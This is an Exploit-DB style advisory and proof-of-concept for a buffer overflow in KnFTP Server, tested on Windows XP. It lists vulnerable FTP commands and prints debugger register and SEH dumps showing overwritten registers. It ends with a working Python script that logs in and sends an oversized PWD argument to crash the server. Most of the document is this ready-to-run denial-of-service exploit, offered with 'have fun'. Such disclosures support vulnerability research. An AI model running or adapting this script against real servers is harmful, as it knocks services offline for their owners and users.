KnFTP Server Buffer Overflow Exploit (DoS PoC)

vendor:

KnFTP Server

by:

The eh?-Team || The Great White Fuzz

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: KnFTP Server

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2/SP3 Professional

2011

KnFTP Server Buffer Overflow Exploit (DoS PoC)

The KnFTP Server is vulnerable to a buffer overflow attack, which can be exploited to cause a denial of service. The vulnerable commands are MKD, LS, ABOR, CD, APPE, REST, and PWD. The application was tested on Windows XP SP2/SP3 Professional with DEP off. The EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI, EIP, C, P, A, Z, S, T, D, O, EFL, ST0-ST7, FST, and FCW registers are all overwritten.

Mitigation:

The vendor has not released a patch for this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python

# Title: KnFTP Server Buffer Overflow Exploit (DoS PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret (kinda)
# Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/

# Date Found: Sept 18th 2011
# Tested on: Windows XP SP2/SP3 Professional (DEP off)
# Nod to the Exploit-DB Team
 
# Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD
# So it just looks like all this app's commands are vulnerable. Even commands
# that the server doesn't support. SEH and/or EIP gets overwriten. 
# It's almost like this application was made to be vulnerable.
# Anyway have fun.

#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "MKD"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFE
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDE000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "LS"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFF
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDE000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

#SEH chain of thread 000001BC, item 0
#Address=00C7FFDC
#SE handler=41414141

#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "ABOR"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFD
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDD000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


import socket
 
 
buffer = "\x41" * 9000
 
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('PWD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close